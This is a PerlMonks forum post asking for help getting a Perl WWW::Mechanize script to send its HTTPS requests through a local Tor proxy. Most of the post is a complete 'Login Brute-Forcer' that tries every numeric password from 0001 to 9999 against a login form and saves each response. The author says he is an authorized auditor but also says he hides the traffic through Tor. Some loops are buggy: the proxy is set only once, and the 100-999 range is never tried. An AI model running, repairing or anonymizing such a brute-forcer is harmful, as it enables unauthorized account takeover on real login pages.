Kind Monks,
I have a rather peculiar problem. Before I get to it, let me describe my situation(or you can skip to 'PROBLEM'), so you may understand my intentions are noble. I am a security auditor for my company, and my task is to find the vulnerable holes before malicious hackers do. My current project involves auditing their timesheet login page. My goal is to test for weak passwords, namely, the numeric possibilities from 1-9999(I have my own list of usernames). I have coded a rudimentary Perl program that handles the requests and logs the requests nicely. However, I am requested to perform the audit from an outsider's perspective, ie, no prior knowledge of the company. In keeping with the spirit of my directive, I'm using Tor to anonymize the connections. Tor runs as a proxy on localhost, and redirects the connections from there. It handles HTTP and HTTPS fine on my web browser, but not with my script. That brings me to my...

PROBLEM:
I cannot get SSL connections to use a proxy specified through WWW:Mechanize. HTTP connections appear to correctly filter through the proxy. Proxy is running on 127.0.0.1:8118, and handles HTTP/HTTPS fine. Netmon confirms these suspicions about TCP/SSL traffic from my script being handled differently.

SOLUTIONS ATTEMPTED:
1. Setting HTTP_Proxy and HTTPS_Proxy environment variables by hand
2. Using 'use Crypt:SLLeay'
3. Trying alternate proxy (web proxies)
What follows is the code for my program (naturally sanitized to remove sensitive info). I have searched far and wide for the answer, but cannot get a working solution. Monks, can you help me? It would be most appreciated. CODE: 

#!/usr/bin/perl
#Thanks to IBM for helping to create this - Bret Sweeden especially
#NBTDOTM

use WWW::Mechanize;
use HTTP::Cookies;

#$ENV{HTTPS_PROXY} = '127.0.0.1:8118';
#$ENV{HTTP_PROXY} = '127.0.0.1:8118';

#Determine the number of arguments the user has given us
$NumArgs = $#ARGV + 1;

if ($NumArgs == 0) {
    #Our user has not entered any information. Display help screen.
    header();
    exit();}
elsif ($NumArgs == 1) {
    #Our user has only entered some information. Display help screen.
    header();
    exit();}
if ($NumArgs == 2) {
    #Our user has entered enough for an attack. Begin!
    
    $host = $ARGV[0]; #Host is the first argument supplied
    $user = $ARGV[1]; #Username is the 2nd argument supplied
    #Display header
print qq{
----------------------------------------------------------------------
                   Login Brute-Forcer              
                 Custom Built by Juno              
                              NBTDOTM                                
----------------------------------------------------------------------
};
print "\nYour host is: $host";
print "\nYour username is: $user";
print "\n\nThe program will now try bruteforcing the host you selected
+";

my $url = $host;
my $username = $user;
#1-9
for $i (1 .. 9) {
    print "\nTrying password 000$i...";
    my $outfile = "000" . $i . ".htm";
    my $password = "000" . $i;
    my $mech = WWW::Mechanize->new();
    
    $mech->cookie_jar(HTTP::Cookies->new());

    $mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https:/
+/127.0.0.1:8118/');

    $mech->get($url);
    
    $mech->field(j_username => $username);
    $mech->field(j_password => $password);
    $mech->click();
    $mech->click();
    my $output_page = $mech->content();
    open(OUTFILE, ">$outfile");
    print OUTFILE "$output_page";
    close(OUTFILE);
    print " Done.";
    }

#10-99
for $i (10 .. 99) {
    print "\nTrying password 00$i...";
    my $outfile = "00" . $i . ".htm";
    my $password = "00" . $i;
    my $mech = WWW::Mechanize->new();
    $mech->cookie_jar(HTTP::Cookies->new());
    $mech->get($url);
    #$mech->form_name('j');
    $mech->field(j_username => $username);
    $mech->field(j_password => $password);
    $mech->click();
    $mech->click();
    my $output_page = $mech->content();
    open(OUTFILE, ">$outfile");
    print OUTFILE "$output_page";
    close(OUTFILE);
    print " Done.";
    }

#100-999
for $i (1 .. 9) {
    print "\nTrying password 0$i...";
    my $outfile = "0" . $i . ".htm";
    my $password = "0" . $i;
    my $mech = WWW::Mechanize->new();
    $mech->cookie_jar(HTTP::Cookies->new());
    $mech->get($url);
    #$mech->form_name('j');
    $mech->field(j_username => $username);
    $mech->field(j_password => $password);


    $mech->click();
    $mech->click();
    my $output_page = $mech->content();
    open(OUTFILE, ">$outfile");
    print OUTFILE "$output_page";
    close(OUTFILE);
    print " Done.";
    }

#1000-9999
for $i (1000 .. 9999) {
    print "\nTrying password $i...";
    my $outfile = $i . ".htm";
    my $password = $i;
    my $mech = WWW::Mechanize->new();
    $mech->cookie_jar(HTTP::Cookies->new());
    $mech->get($url);
    #$mech->form_name('j');
    $mech->field(j_username => $username);
    $mech->field(j_password => $password);
    $mech->click();
    $mech->click();
    my $output_page = $mech->content();
    open(OUTFILE, ">$outfile");
    print OUTFILE "$output_page";
    close(OUTFILE);
    print " Done.";
    }

}

print "\n\nAudit complete!";

exit();

sub header{
print qq{
----------------------------------------------------------------------
                   Login Brute-Forcer              
                 Custom Built by Juno              
                              NBTDOTM                                
----------------------------------------------------------------------
Usage: GHGbrute -[target site] -[user]

Example: GHGbrute somesite.com -admin

The program will attempt a numerical bruteforce to four places. 
};
}

[download]

In reply to Using Mech with HTTPS by Juno

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post, it's "PerlMonks-approved HTML":


  • Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
  • Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
  • Read Where should I post X? if you're not absolutely sure you're posting in the right place.
  • Please read these before you post! —
  • Posts may use any of the Perl Monks Approved HTML tags:
    a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
  • You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
            For:     Use:
    & &amp;
    < &lt;
    > &gt;
    [ &#91;
    ] &#93;
  • Link using PerlMonks shortcuts! What shortcuts can I use for linking?
  • See Writeup Formatting Tips and other pages linked from there for more info.